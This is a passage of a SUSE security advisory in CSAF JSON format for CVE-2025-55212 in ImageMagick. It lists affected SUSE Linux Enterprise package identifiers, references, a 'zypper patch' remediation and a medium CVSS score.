"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-55212",
"url": "https://www.suse.com/security/cve/CVE-2025-55212"
},
{
"category": "external",
"summary": "SUSE Bug 1248767 for CVE-2025-55212",
"url": "https://bugzilla.suse.com/1248767"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
